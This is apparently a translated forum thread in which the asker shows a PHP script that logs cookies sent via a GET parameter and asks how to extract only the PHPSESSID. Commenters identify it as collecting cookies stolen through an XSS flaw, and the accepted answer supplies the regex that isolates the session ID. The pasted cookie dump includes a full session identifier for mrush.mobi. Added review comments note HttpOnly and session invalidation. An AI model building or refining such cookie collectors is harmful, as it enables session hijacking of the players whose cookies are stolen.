How to get only PHPSESSID
my code
<?php
// Appends the raw value of the "cookie" query-string parameter to log.txt,
// one entry per request. The value is not validated, escaped or
// length-limited, so any client that can reach this URL can write arbitrary
// text (including extra newlines) into the file.
// NOTE(review): the discussion on this page describes this as the receiving
// end of cookies collected through an XSS flaw on another site. For the
// owner of that site, the relevant controls are: set the HttpOnly attribute
// on the session cookie so page script cannot read it, fix the injection
// point, and invalidate any session ID that has left the browser this way.
// Because the value travels in a GET query string it is also likely to be
// copied into web-server access logs and proxies along the path.
$fw = fopen("log.txt", "a"); // append mode; the return value is not checked
fwrite($fw, $_GET["cookie"]."\n"); // an absent "cookie" key triggers a PHP notice/warning and only "\n" is written
fclose($fw);
?>
What I have now
mail_info_10999781={"count":4,"lastPostId":"442384768","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1586381539,"countNew":"4"}; mail_info_4180878=[]; mail_info_2329300=[]; mail_info_10982672=[]; mail_info_10524789={"count":3,"lastPostId":"444114528","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504640,"countNew":"3"}; mail_info_9061283={"count":3,"lastPostId":"444114548","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504666,"countNew":"3"}; mail_info_4767868=[]; mail_info_2307930=[]; mail_info_3713915={"count":4,"lastPostId":"444115078","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587505121,"countNew":"4"}; mail_info_11019215=[]; uidc=75e9f7984b904a; mail_info_7521919={"count":3,"lastPostId":"444119300","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509668,"countNew":"3"}; mail_info_5249555={"count":3,"lastPostId":"444119305","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509682,"countNew":"3"}; mail_info_9721044={"count":3,"lastPostId":"444119330","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509739,"countNew":"3"}; mail_info_9200661={"count":1,"lastPostId":"444119783","playerId":"10978816","playerName":"Букая","text":"Перса верните","dateAdded":1587511049,"countNew":"1"}; mail_info_3775637=[]; mail_info_10950336=[]; mail_info_2728587=[]; mail_info_10799719={"count":4,"lastPostId":"444145953","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587543962,"countNew":"4"}; mail_info_3782473={"count":4,"lastPostId":"444146002","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587543991,"countNew":"4"}; mail_info_8929282={"count":5,"lastPostId":"444146020","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544010,"countNew":"5"}; 
mail_info_6872423={"count":4,"lastPostId":"444146071","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544041,"countNew":"4"}; mail_info_10947584=[]; mail_info_5361529=[]; mail_info_11024570=[]; mail_info_10824306={"count":3,"lastPostId":"444149063","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587546093,"countNew":"3"}; mail_info_9126714=[]; mail_info_9412550=[]; mail_info_8087106=[]; PHPSESSID=720e9a61f3ce5acf34e005ba0811a4e0.1587566959.5217338; mail_info_10209738=[]; lastSyncDate=1587568026488mrush.mobi
Only 720e9a961f3ce5acf34e005ba0811a4e0.1587566959.5217338
Print $_GET["cookie"] and see which key holds the information you need.
FanatPHP, a novice hacker has found an XSS somewhere and is collecting cookies on his server.
Maxim Fedorov I have printed it out above
These cookies are coming to me and I only need PHPSESSID
mail_info_10999781={"count":4,"lastPostId":"442384768","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1586381539,"countNew":"4"}; mail_info_4180878=[]; mail_info_2329300=[]; mail_info_10982672=[]; mail_info_10524789={"count":3,"lastPostId":"444114528","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504640,"countNew":"3"}; mail_info_9061283={"count":3,"lastPostId":"444114548","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504666,"countNew":"3"}; mail_info_4767868=[]; mail_info_2307930=[]; mail_info_3713915={"count":4,"lastPostId":"444115078","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587505121,"countNew":"4"}; mail_info_11019215=[]; uidc=75e9f7984b904a; mail_info_7521919={"count":3,"lastPostId":"444119300","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509668,"countNew":"3"}; mail_info_5249555={"count":3,"lastPostId":"444119305","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509682,"countNew":"3"}; mail_info_9721044={"count":3,"lastPostId":"444119330","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509739,"countNew":"3"}; mail_info_9200661={"count":1,"lastPostId":"444119783","playerId":"10978816","playerName":"Букая","text":"Перса верните","dateAdded":1587511049,"countNew":"1"}; mail_info_3775637=[]; mail_info_10950336=[]; mail_info_2728587=[]; mail_info_10799719={"count":4,"lastPostId":"444145953","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587543962,"countNew":"4"}; mail_info_3782473={"count":4,"lastPostId":"444146002","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587543991,"countNew":"4"}; mail_info_8929282={"count":5,"lastPostId":"444146020","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544010,"countNew":"5"}; 
mail_info_6872423={"count":4,"lastPostId":"444146071","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544041,"countNew":"4"}; mail_info_10947584=[]; mail_info_5361529=[]; mail_info_11024570=[]; mail_info_10824306={"count":3,"lastPostId":"444149063","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587546093,"countNew":"3"}; mail_info_9126714=[]; mail_info_9412550=[]; mail_info_8087106=[]; PHPSESSID=720e9a61f3ce5acf34e005ba0811a4e0.1587566959.5217338; mail_info_10209738=[]; lastSyncDate=1587568026488mrush.mobi
there is no way to get it.

Why is this sausage sent via GET and not POST?

1 Answer

Best answer
$str = 'mail_info_10999781={"count":4,"lastPostId":"442384768","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1586381539,"countNew":"4"}; mail_info_4180878=[]; mail_info_2329300=[]; mail_info_10982672=[]; mail_info_10524789={"count":3,"lastPostId":"444114528","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504640,"countNew":"3"}; mail_info_9061283={"count":3,"lastPostId":"444114548","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504666,"countNew":"3"}; mail_info_4767868=[]; mail_info_2307930=[]; mail_info_3713915={"count":4,"lastPostId":"444115078","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587505121,"countNew":"4"}; mail_info_11019215=[]; uidc=75e9f7984b904a; mail_info_7521919={"count":3,"lastPostId":"444119300","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509668,"countNew":"3"}; mail_info_5249555={"count":3,"lastPostId":"444119305","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509682,"countNew":"3"}; mail_info_9721044={"count":3,"lastPostId":"444119330","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509739,"countNew":"3"}; mail_info_9200661={"count":1,"lastPostId":"444119783","playerId":"10978816","playerName":"Букая","text":"Перса верните","dateAdded":1587511049,"countNew":"1"}; mail_info_3775637=[]; mail_info_10950336=[]; mail_info_2728587=[]; mail_info_10799719={"count":4,"lastPostId":"444145953","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587543962,"countNew":"4"}; mail_info_3782473={"count":4,"lastPostId":"444146002","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587543991,"countNew":"4"}; mail_info_8929282={"count":5,"lastPostId":"444146020","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544010,"countNew":"5"}; 
mail_info_6872423={"count":4,"lastPostId":"444146071","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544041,"countNew":"4"}; mail_info_10947584=[]; mail_info_5361529=[]; mail_info_11024570=[]; mail_info_10824306={"count":3,"lastPostId":"444149063","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587546093,"countNew":"3"}; mail_info_9126714=[]; mail_info_9412550=[]; mail_info_8087106=[]; PHPSESSID=720e9a61f3ce5acf34e005ba0811a4e0.1587566959.5217338; mail_info_10209738=[]; lastSyncDate=1587568026488mrush.mobi';
// Extracts the PHPSESSID value from the cookie string held in $str.
// The lazy group (.+?) ends at the first ';' after "PHPSESSID=", so the
// pattern matches only when a semicolon follows the value.
if(preg_match('/PHPSESSID=(.+?);/', $str, $matches)){
// $matches[1] is the captured session identifier; it is echoed as-is,
// without escaping for the output context.
// NOTE(review): a session identifier is a bearer credential: whoever holds
// it can typically use that session until the server invalidates it. It
// should therefore not be printed, logged or posted in full; the sample
// string on this page contains one and should be treated as exposed.
echo $matches[1];
}else{
// No "PHPSESSID=...;" pair was found in $str.
echo 'Oops';
}
...